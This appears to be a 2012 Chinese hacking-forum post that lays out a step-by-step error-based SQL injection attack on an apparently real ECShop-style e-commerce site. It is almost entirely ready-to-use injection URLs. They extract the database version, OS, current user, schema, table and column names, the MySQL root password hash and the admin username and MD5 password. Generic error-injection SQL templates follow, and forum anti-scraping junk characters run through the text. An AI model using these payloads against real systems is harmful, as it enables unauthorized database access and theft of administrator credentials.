找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2244|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
6 w& b2 ~/ ~# qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 `* c& o% t7 Z. ~8 E
' `  K0 w1 ^! U判断系统! C1 E& v0 p: u0 b

; l  ^9 Q. v1 L; q: C. u1 k# phttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 X1 ^, L. ~9 g
4 N5 d+ G! u( k3 f1 A8 H9 H$ k# D2 J0 B
& P) G. A# k. M  k- n
当前 user()2 p* x. k) n1 m  X, e9 P
9 z. I7 W6 {1 a8 x5 e, P# a. k
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' {" m: r4 Y: x- Y: D3 O% o1 p* G7 }$ e0 d$ j
9 z- c8 d/ M! H( {& Q

5 V( d* ?! e0 Y6 g# L5 o当前 database()( M" r/ V9 d8 T4 z; u
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) v+ s2 a0 ?# N$ F
& U: O. f3 y$ R- A0 O
0 e% }6 \; B1 s! w9 r# e3 P, c1 p
( P$ w4 c: P# `) C/ {2 _% B% `/ W4 O! O0 a( U8 m3 f9 S
root hash7 P. W% [1 q* G4 {
! V4 f+ o+ z2 l* o6 e
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 `9 \! I) q0 G8 T% _# Y8 g- b1 n0 ]

. M3 a" d) @( Z) N; ^
/ |% Y9 O  f4 I! l# m. i: A3 C当前 数据库表名: {! p  r1 A$ }/ j

/ \2 T; B& j: h. N+ Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) ?8 U$ ]" u+ `! p+ l
  D5 O6 }+ y# X3 T2 d

0 |4 J) l7 {6 s& ]/ J  D: G) u; y1 `
1 _! _7 k( `! p. G4 X2 y7 n当前 数据库 user_name 字段6 \6 q" B1 }  O8 j; f9 s" V

" D( Q5 l) H( [+ J& j/ E8 ]http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# P- R9 a8 D# ^- M/ r9 m; p# i% P
$ s/ ^3 U" @( i1 }/ z$ r当前 数据库 字段 password
- G# |- H$ ]! G4 ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) G. G  |. D; J+ a! y; l
* I! s+ R' V4 a! C- _$ j0 |# K; k+ E. ]5 p
0 {- N& k! k% U( h0 N
获得 admin passwd(md5)4 \+ ?; S1 t0 G
) S  k9 G; k$ r  p
+ `* i; L: t# _( [
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 N/ o1 X/ Z9 g' o# n
' [6 f  Z/ e. C2 J/ O7 r报错注射! U1 Q7 `8 t6 O9 r5 ^
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)! q% C# ^5 J2 T1 L

5 g; G& Q9 J3 a& f6 kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
2 U7 W% B* @5 w( D2 Y3 A7 \, C5 `9 G( [+ h! b" |7 L
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表